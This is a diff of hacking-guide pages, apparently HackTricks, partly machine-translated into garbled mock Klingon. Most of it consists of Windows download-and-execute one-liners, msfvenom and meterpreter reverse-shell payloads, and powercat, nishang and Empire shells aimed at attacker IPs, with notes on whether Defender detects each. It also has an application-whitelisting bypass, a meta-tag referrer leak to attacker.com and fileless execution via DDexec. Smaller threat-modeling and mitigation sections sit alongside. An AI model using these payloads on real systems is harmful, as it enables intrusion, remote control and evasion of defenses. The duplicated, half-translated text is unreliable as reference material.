certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
``` ```
**Translation:**
Download a B64exe, decode it and execute it. **Download a B64exe, decode it and execute it.**
**Translation (Klingon):**
**B64exe vItlhutlh, vItlhutlh je vItlhutlh.**
**Translation (Markdown):**
**Download a B64exe, decode it and execute it.**
```bash ```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
``` ```
**Qa'vIn Defender Daq yIlo'**
**Detected by defender**
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. vulnerabilities vItlhutlhlaHvIS, vItlhutlh scans proactive threat, vItlhutlh issues tech stack, APIs web apps cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
*** ***
## **Cscript/Wscript** ## **Cscript/Wscript**
```bash ```bash
powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
``` ```
**Cscript - Metasploit** **Cscript - Metasploit**
Cscript is a command-line scripting engine provided by Microsoft. It is commonly used for running VBScript or JScript scripts on Windows systems. Metasploit, on the other hand, is a popular penetration testing framework that includes various tools and exploits for testing the security of computer systems.
When it comes to using Cscript with Metasploit, there are a few techniques that can be employed. One common approach is to use Cscript to execute a malicious VBScript or JScript payload generated by Metasploit. This payload can be designed to exploit vulnerabilities in the target system and provide the attacker with remote access or control.
To execute a Metasploit payload using Cscript, the following steps can be followed:
1. Generate the payload using Metasploit. This can be done using the `msfvenom` command, specifying the desired payload type, target architecture, and other relevant options.
2. Save the generated payload as a VBScript or JScript file, with a `.vbs` or `.js` extension, respectively.
3. Transfer the payload file to the target system. This can be done using various methods, such as uploading it to a compromised web server, sending it via email, or using other file transfer techniques.
4. On the target system, open a command prompt and navigate to the directory where the payload file is located.
5. Execute the payload using Cscript by running the following command: `cscript payload.vbs` or `cscript payload.js`, depending on the file extension.
6. If successful, the payload will be executed, and the attacker will gain remote access or control over the target system.
It is important to note that using Cscript with Metasploit requires careful planning and consideration of the target system's security measures. Additionally, it is crucial to ensure that the actions performed are legal and within the scope of authorized penetration testing activities.
```bash ```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
``` ```
**Qap by defender**
**Detected by defender**
## PS-Bat ## PS-Bat
```bash ```bash
\\webdavserver\folder\batchfile.bat \\webdavserver\folder\batchfile.bat
``` ```
**svchost.exe** jatlhpu' network call yIngu'\
Process performing network call: **svchost.exe**\
Payload written on disk: **WebDAV client local cache** Payload written on disk: **WebDAV client local cache**
```bash ```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd` impacket-smbserver -smb2support kali `pwd`
@ -371,103 +635,91 @@ impacket-smbserver -smb2support kali `pwd`
```bash ```bash
\\10.8.0.3\kali\shell.bat \\10.8.0.3\kali\shell.bat
``` ```
**Qa'vIn Defender**
**Detected by defender**
## **MSIExec** ## **MSIExec**
Attacker Qa'vInpu' 'e' yIDel
## **MSIExec**
Qa'vInpu' 'e' yIDel
``` ```
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80 python -m SimpleHTTPServer 80
``` ```
**Victim:**
Victim: The victim is the target of the hacking attack. It refers to the individual, organization, or system that the hacker intends to compromise or gain unauthorized access to. Understanding the victim's vulnerabilities, weaknesses, and potential entry points is crucial for a successful hacking attempt.
``` ```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
``` ```
**Qap**
**Detected**
## **Wmic** ## **Wmic**
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [Qa'pu'](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
wmic os get /format:"https://webserver/payload.xsl" wmic os get /format:"https://webserver/payload.xsl"
``` ```
Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
```xml ```xml
<?xml version='1.0'?> <?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/> <output method="text"/>
<ms:script implements-prefix="user" language="JScript"> <ms:script implements-prefix="user" language="JScript">
<![CDATA[ <![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -"); var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]> ]]>
</ms:script> </ms:script>
</stylesheet> </stylesheet>
``` ```
**ghItlhvam**
**Not detected** **tlhInganpu' jatlhlaHbe'chugh, Koadic zombie download & execute laH wmic stager.**
**You can download & execute very easily a Koadic zombie using the stager wmic**
## Msbuild ## Msbuild
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [ghaH](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
``` ```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
``` ```
**Translation:**
You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell.\ **You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell.\
Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)**
``` ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
``` ```
**ghItlh**
**Not detected**
## **CSC** ## **CSC**
Compile C# code in the victim machine. vItlhutlh C# code vItlhutlh vItlhutlh.
``` ```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
``` ```
**ghItlhvam**
You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) * [ghItlhvam](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) vItlhutlh.
**Not deteted** **ghItlhvam**
## **Regasm/Regsvc**
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
* [ghItlhvam](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
``` ```
**jIyajbe'**
**I haven't tried it**
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) [**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
## Odbcconf ## Odbcconf
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [ghorgh](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
``` ```
**jIyajbe'**
**I haven't tried it**
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) [**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
@ -477,96 +729,98 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_ make a copy of the script and append to the end of the file: In the **Shells** folder, there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_, make a copy of the script and append to the end of the file:
``` ```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
``` ```
Start serving the script in a web server and execute it on the victim's end: Start serving the script in a web server and execute it on the victim's end:
Qa'vam script vItlhutlh web server 'ej vItlhutlh 'oH victim's end:
``` ```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
``` ```
Defender jatlhpu'wI' jatlhpu' 'e' vItlhutlh (vaj, 3/04/2019).
Defender doesn't detect it as malicious code (yet, 3/04/2019). **TODO: nISang shells lo'wI' jaH**
**TODO: Check other nishang shells**
### **PS-Powercat** ### **PS-Powercat**
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) [**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
Download, start a web server, start the listener, and execute it on the victim's end: Download, web server vItlhutlh, listener vItlhutlh, 'ej vItlhutlh victim's end:
``` ```
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
``` ```
Defender jatlhpu'wI' malja' (vaj, 3/04/2019).
Defender doesn't detect it as malicious code (yet, 3/04/2019). **powercat toQDuj:**
**Other options offered by powercat:**
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files... Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
``` ```
Serve a cmd Shell: Serve a cmd Shell:
powercat -l -p 443 -e cmd powercat -l -p 443 -e cmd
Send a cmd Shell: Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell: Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP: Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay: TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443 powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File: Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep powercat -l -p 443 -i C:\inputfile -rep
``` ```
### Empire ### Empire
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
Create a powershell launcher, save it in a file and download and execute it. **tlhIngan Hol:**
**Qapla'!** [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
**powershell** launcher yIlo'lu', **file** vItlhutlh je, **download** je **execute**.
``` ```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
``` ```
**Qa'leghvam vItlhutlh**
**Detected as malicious code**
### MSF-Unicorn ### MSF-Unicorn
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) [https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
Create a powershell version of metasploit backdoor using unicorn unicorn vItlhutlh metasploit backdoor powershell version vItlhutlh.
``` ```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
``` ```
Qapla' msfconsole vItlhutlh!:
Start msfconsole with the created resource: ```
msfconsole -r created_resource.rc
```
vItlhutlh created_resource.rc jatlhqa'!
``` ```
msfconsole -r unicorn.rc msfconsole -r unicorn.rc
``` ```
Start a web server serving the _powershell\_attack.txt_ file and execute in the victim: Start a web server serving the _powershell\_attack.txt_ file and execute in the victim:
``` ```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" Invoke-WebRequest -Uri http://<attacker_ip>:<port>/powershell_attack.txt -OutFile C:\temp\powershell_attack.txt
``` ```
**Detected as malicious code** This command will download the _powershell\_attack.txt_ file from the attacker's web server and save it to the victim's machine in the _C:\temp_ directory.
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
**QaD jImej**
## More ## vItlhutlh
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console with some offensive PS modules preloaded (cyphered)\ [PS>Attack](https://github.com/jaredhaight/PSAttack) PS console vItlhutlh offensive PS modules preloaded (cyphered)\
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ [https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection (IEX) WinPWN](https://github.com/SecureThisShit/WinPwn) PS console vItlhutlh offensive PS modules proxy detection (IEX)
## References ## References
@ -581,7 +835,7 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. vItlhutlh vulnerabilities 'oH vItlhutlh 'oH vItlhutlh. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

View file

@ -2,7 +2,7 @@
## Threat Modeling ## Threat Modeling
Welcome to HackTricks' comprehensive guide on Threat Modeling! Embark on an exploration of this critical aspect of cybersecurity, where we identify, understand, and strategize against potential vulnerabilities in a system. This thread serves as a step-by-step guide packed with real-world examples, helpful software, and easy-to-understand explanations. Ideal for both novices and experienced practitioners looking to fortify their cybersecurity defenses. QaH jatlh HackTricks' comprehensive guide on Threat Modeling! QapHa' jImej, DaH jImej, 'ej strategize against potential vulnerabilities in a system. vItlhutlh thread serves as a step-by-step guide packed with real-world examples, helpful software, 'ej easy-to-understand explanations. Ideal for both novices 'ej experienced practitioners looking to fortify their cybersecurity defenses.
### Commonly Used Scenarios ### Commonly Used Scenarios
@ -19,30 +19,30 @@ Threat models often feature elements marked in red, symbolizing potential vulner
The CIA Triad is a widely recognized model in the field of information security, standing for Confidentiality, Integrity, and Availability. These three pillars form the foundation upon which many security measures and policies are built, including threat modeling methodologies. The CIA Triad is a widely recognized model in the field of information security, standing for Confidentiality, Integrity, and Availability. These three pillars form the foundation upon which many security measures and policies are built, including threat modeling methodologies.
1. **Confidentiality**: Ensuring that the data or system is not accessed by unauthorized individuals. This is a central aspect of security, requiring appropriate access controls, encryption, and other measures to prevent data breaches. 1. **Confidentiality**: Ensuring that the data or system is not accessed by unauthorized individuals. This is a central aspect of security, requiring appropriate access controls, encryption, 'ej other measures to prevent data breaches.
2. **Integrity**: The accuracy, consistency, and trustworthiness of the data over its lifecycle. This principle ensures that the data is not altered or tampered with by unauthorized parties. It often involves checksums, hashing, and other data verification methods. 2. **Integrity**: The accuracy, consistency, 'ej trustworthiness of the data over its lifecycle. This principle ensures that the data is not altered or tampered with by unauthorized parties. It often involves checksums, hashing, 'ej other data verification methods.
3. **Availability**: This ensures that data and services are accessible to authorized users when needed. This often involves redundancy, fault tolerance, and high-availability configurations to keep systems running even in the face of disruptions. 3. **Availability**: This ensures that data 'ej services are accessible to authorized users when needed. This often involves redundancy, fault tolerance, 'ej high-availability configurations to keep systems running even in the face of disruptions.
### Threat Modeling Methodlogies ### Threat Modeling Methodlogies
1. **STRIDE**: Developed by Microsoft, STRIDE is an acronym for **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege**. Each category represents a type of threat, and this methodology is commonly used in the design phase of a program or system to identify potential threats. 1. **STRIDE**: Developed by Microsoft, STRIDE is an acronym for **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, 'ej Elevation of Privilege**. Each category represents a type of threat, 'ej this methodology is commonly used in the design phase of a program or system to identify potential threats.
2. **DREAD**: This is another methodology from Microsoft used for risk assessment of identified threats. DREAD stands for **Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability**. Each of these factors is scored, and the result is used to prioritize identified threats. 2. **DREAD**: This is another methodology from Microsoft used for risk assessment of identified threats. DREAD stands for **Damage potential, Reproducibility, Exploitability, Affected users, 'ej Discoverability**. Each of these factors is scored, 'ej the result is used to prioritize identified threats.
3. **PASTA** (Process for Attack Simulation and Threat Analysis): This is a seven-step, **risk-centric** methodology. It includes defining and identifying security objectives, creating a technical scope, application decomposition, threat analysis, vulnerability analysis, and risk/triage assessment. 3. **PASTA** (Process for Attack Simulation 'ej Threat Analysis): This is a seven-step, **risk-centric** methodology. It includes defining 'ej identifying security objectives, creating a technical scope, application decomposition, threat analysis, vulnerability analysis, 'ej risk/triage assessment.
4. **Trike**: This is a risk-based methodology that focuses on defending assets. It starts from a **risk management** perspective and looks at threats and vulnerabilities in that context. 4. **Trike**: This is a risk-based methodology that focuses on defending assets. It starts from a **risk management** perspective 'ej looks at threats 'ej vulnerabilities in that context.
5. **VAST** (Visual, Agile, and Simple Threat modeling): This approach aims to be more accessible and integrates into Agile development environments. It combines elements from the other methodologies and focuses on **visual representations of threats**. 5. **VAST** (Visual, Agile, 'ej Simple Threat modeling): This approach aims to be more accessible 'ej integrates into Agile development environments. It combines elements from the other methodologies 'ej focuses on **visual representations of threats**.
6. **OCTAVE** (Operationally Critical Threat, Asset, and Vulnerability Evaluation): Developed by the CERT Coordination Center, this framework is geared toward **organizational risk assessment rather than specific systems or software**. 6. **OCTAVE** (Operationally Critical Threat, Asset, 'ej Vulnerability Evaluation): Developed by the CERT Coordination Center, this framework is geared toward **organizational risk assessment rather than specific systems or software**.
## Tools ## Tools
There are several tools and software solutions available that can **assist** with the creation and management of threat models. Here are a few you might consider. There are several tools 'ej software solutions available that can **assist** with the creation 'ej management of threat models. Here are a few you might consider.
### [SpiderSuite](https://github.com/3nock/SpiderSuite) ### [SpiderSuite](https://github.com/3nock/SpiderSuite)
An advance cross-platform and multi-feature GUI web spider/crawler for cyber security professionals. Spider Suite can be used for attack surface mapping and analysis. An advance cross-platform 'ej multi-feature GUI web spider/crawler for cyber security professionals. Spider Suite can be used for attack surface mapping 'ej analysis.
**Usage** **Usage**
1. Pick a URL and Crawl 1. Pick a URL 'ej Crawl
<figure><img src="../.gitbook/assets/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/threatmodel_spidersuite_1.png" alt=""><figcaption></figcaption></figure>
@ -52,7 +52,7 @@ An advance cross-platform and multi-feature GUI web spider/crawler for cyber sec
### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases) ### [OWASP Threat Dragon](https://github.com/OWASP/threat-dragon/releases)
An open-source project from OWASP, Threat Dragon is both a web and desktop application that includes system diagramming as well as a rule engine to auto-generate threats/mitigations. An open-source project from OWASP, Threat Dragon is both a web 'ej desktop application that includes system diagramming as well as a rule engine to auto-generate threats/mitigations.
**Usage** **Usage**
@ -96,16 +96,16 @@ Now you can create the threat
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
Keep in mind that there is a difference between Actor Threats and Process Threats. If you would add a threat to an Actor then you will only be able to choose "Spoofing" and "Repudiation. However in our example we add threat to a Process entity so we will see this in the threat creation box: Keep in mind that there is a difference between Actor Threats 'ej Process Threats. If you would add a threat to an Actor then you will only be able to choose "Spoofing" 'ej "Repudiation. However in our example we add threat to a Process entity so we will see this in the threat creation box:
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
6. Done 6. Done
Now your finished model should look something like this. And this is how you make a simple threat model with OWASP Threat Dragon. Now your finished model should look something like this. 'ej this is how you make a simple threat model with OWASP Threat Dragon.
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool) ### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack. This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology 'ej is particularly suitable for those developing on Microsoft's stack.

File diff suppressed because one or more lines are too long

View file

@ -1,8 +1,6 @@
<details> <details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary><strong>qaStaHvIS AWS hacking vItlh zero to hero</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks: Other ways to support HackTricks:
@ -17,7 +15,7 @@ Other ways to support HackTricks:
# Referrer headers and policy # Referrer headers and policy
Referrer is the header used by browsers to indicate which was the previous page visited. Referrer vItlh browsers lo'laH previous page visited jImej.
## Sensitive information leaked ## Sensitive information leaked
@ -26,7 +24,6 @@ If at some point inside a web page any sensitive information is located on a GET
## Mitigation ## Mitigation
You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications: You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
``` ```
Referrer-Policy: no-referrer Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade Referrer-Policy: no-referrer-when-downgrade
@ -37,19 +34,16 @@ Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url Referrer-Policy: unsafe-url
``` ```
## Counter-Mitigation ## Counter-Mitigation
You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection): {HTML meta tag translation} (HTML injection attack vItlhutlh):
```markup ```markup
<meta name="referrer" content="unsafe-url"> <meta name="referrer" content="unsafe-url">
<img src="https://attacker.com"> <img src="https://attacker.com">
``` ```
## QeH
## Defense jImej GET parameters qojDaq pagh URL Daq vItlhutlh.
Never put any sensitive data inside GET parameters or paths in the URL.
<details> <details>
@ -65,5 +59,3 @@ Other ways to support HackTricks:
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>

View file

@ -28,12 +28,12 @@ It's more and more common to find linux machines mounted with **read-only (ro) f
<pre class="language-yaml"><code class="lang-yaml">apiVersion: v1 <pre class="language-yaml"><code class="lang-yaml">apiVersion: v1
kind: Pod kind: Pod
metadata: metadata:
name: alpine-pod name: alpine-pod
spec: spec:
containers: containers:
- name: alpine - name: alpine
image: alpine image: alpine
securityContext: securityContext:
<strong> readOnlyRootFilesystem: true <strong> readOnlyRootFilesystem: true
</strong> command: ["sh", "-c", "while true; do sleep 1000; done"] </strong> command: ["sh", "-c", "while true; do sleep 1000; done"]
</code></pre> </code></pre>
@ -75,57 +75,49 @@ Therefore, **controlling the assembly code** that is being executed by the proce
{% hint style="success" %} {% hint style="success" %}
**DDexec / EverythingExec** will allow you to load and **execute** your own **shellcode** or **any binary** from **memory**. **DDexec / EverythingExec** will allow you to load and **execute** your own **shellcode** or **any binary** from **memory**.
{% endhint %} {% endhint %}
```bash ```bash
# Basic example # Basic example
wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
``` ```
For more information about this technique check the Github or:
{% content-ref url="ddexec.md" %}
[ddexec.md](ddexec.md)
{% endcontent-ref %}
### MemExec ### MemExec
[**Memexec**](https://github.com/arget13/memexec) is the natural next step of DDexec. It's a **DDexec shellcode demonised**, so every time that you want to **run a different binary** you don't need to relaunch DDexec, you can just run memexec shellcode via the DDexec technique and then **communicate with this deamon to pass new binaries to load and run**. [**Memexec**](https://github.com/arget13/memexec) jImejDaq **DDexec**. **DDexec shellcode demonised** vItlhutlh, **binary vItlhutlh** run **bI'rel** **DDexec** vItlhutlh, **memexec shellcode** run **bI'rel** **communicate**.
You can find an example on how to use **memexec to execute binaries from a PHP reverse shell** in [https://github.com/arget13/memexec/blob/main/a.php](https://github.com/arget13/memexec/blob/main/a.php). **memexec to execute binaries from a PHP reverse shell** [https://github.com/arget13/memexec/blob/main/a.php](https://github.com/arget13/memexec/blob/main/a.php) **example**.
### Memdlopen ### Memdlopen
With a similar purpose to DDexec, [**memdlopen**](https://github.com/arget13/memdlopen) technique allows an **easier way to load binaries** in memory to later execute them. It could allow even to load binaries with dependencies. **memdlopen** [**memdlopen**](https://github.com/arget13/memdlopen) technique **load binaries** **easier way** **execute**. **load binaries with dependencies** **allow**.
## Distroless Bypass ## Distroless Bypass
### What is distroless ### Distroless vItlhutlh
